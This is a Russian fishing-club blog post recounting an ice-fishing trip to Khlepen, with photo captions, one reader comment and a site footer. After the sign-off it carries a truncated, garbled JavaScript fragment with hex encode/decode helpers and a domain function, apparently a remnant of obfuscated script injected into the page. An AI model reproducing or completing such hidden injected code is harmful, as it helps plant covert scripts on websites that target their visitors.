Хлипкая Хлепень.

 

30/01/

1miro456

Как и Коммандор, который написал: «Давно я не был в Хлепени и ни разу здесь не ловил бели»Я в отличии от него и не собирался ее ловить, хотя тоже давно не был. Далее пишет: «Хотел пройти километов, но уже через пару километров ходьбы по насту, под которым вода, сдался и повернул с Юрой в сторону русла.Уколов упилил дальше.» Хотел пройти километов , но уже через пару

километров ходьбы по насту, под которым вода, сдался и повернул с Юрой в сторону русла. Уколов упилил дальше. «

Я не так поступил, я сперьва вышел на мост, на его середину и глянул в даль, налево сначала, потом направо. И направо мне а было это в начале утра, часов около семи, понравилось, больше. Темнее что ли там, не видать было призрачного света палаток и окружающего жилья. И дойдя до края моста, на жопе скатился с его откоса, подгоняемый своим же ящиком, пристегнутым  к себе любимому.

2miro466

И по насту, который не держал и проваливался в воду, плескающуюся под ним, да еще и скользко было. Под ним же. И допилил, проскальзывая, до того самого места, про которое написал  Коммандор, где его и встрянул, «со товарищи». Но Уколова,  я не видал. Поверил на слово. Они на русло с Юрой Юказом двинули, а я от него, так как шел от моста именно по ему(по руслу), к берегу. Ну типа, «не бель» ловить.

3miro4459

Так и шараЁбился у того, самого берега, выискивая, нормальную глубину, на которой, эта самая «не бель«, могла бы  ловиться.

4miro456

А глубины там, даже под казалось, бы рядышком, берегом, до 19 метров.

5miro456

Нет, «небели» не нашёл и случился мне тока, один окушок, чуть больше балансира 7-ки. Погода, Весна. Лунки размывает, как в апреле. А бель понятное дело ловилась, со слов смольчан, ловивших, без прикормки, на безмотылку, с 10-12 метров. Но «Фанерку».

6miro456

Гулял потом и к руслу,повидав Командора, весело таскавшего, «её» на мОтыля, с прикормленных лунок,
говоря при этом: «вот любимая рыба, Лёни Куликова» и к тому берегу тож сходил.

7miro456

Ничего. И потихоньку стал отступать, к автобусу, периодически приостанавливаясь, у как мне казалось, перспективных мест. Увы.

8miro456

Поставухи ставят, значит есть на кого, не так ли??

9miro456

Набрел, на старика Хенка(Вова, фляжечка — класс) с Геннадием Петровичем, они не бились за дальностью, отхода от моста и автобуса.

10miro456

Но ловили, там туда куда дошли. И не плохо ловили.

11miro456

Петрович, даже баальшого леща, у лунки пополаскал. «Вынуть было нереально», — сказал он.

12miro456+

На левой,стороне, за мостом, народу, больше, но по рыбе, так же, даже те кто вышел, рано-рано из автобуса в Горшково, тоже это говорили. На обратном пути.

13miro456

Но в целом, хороший выезд, походил, подышал, покрутил, покрутился, пообщался мальца. Лучше, чем дома на диване, перед «тевелизором«.

15miro456

Так что Хлепень, есть Хлепень.

16miro456

 с уважением,

 

 

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return «nalym.ru»},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(«http»)==0){return p}for(var e=0;e



4 комментария на “Хлипкая Хлепень.”

  1. Гена привет!
    Отчет в очередной раз подтверждает, что ты — натура ищущая и оптимистическая.
    А кто ищет, тот когда нибудь найдет. :-)
    НХНЧ!

Добавить комментарий

Клуб Активной Рыбалки


Реклама


 © ''КЛУБ АКТИВНОЙ РЫБАЛКИ'' WWW.NALYM.RU     Редактор: В.Баловнев.    Администратор: А.Рамодин             Rambler's Top100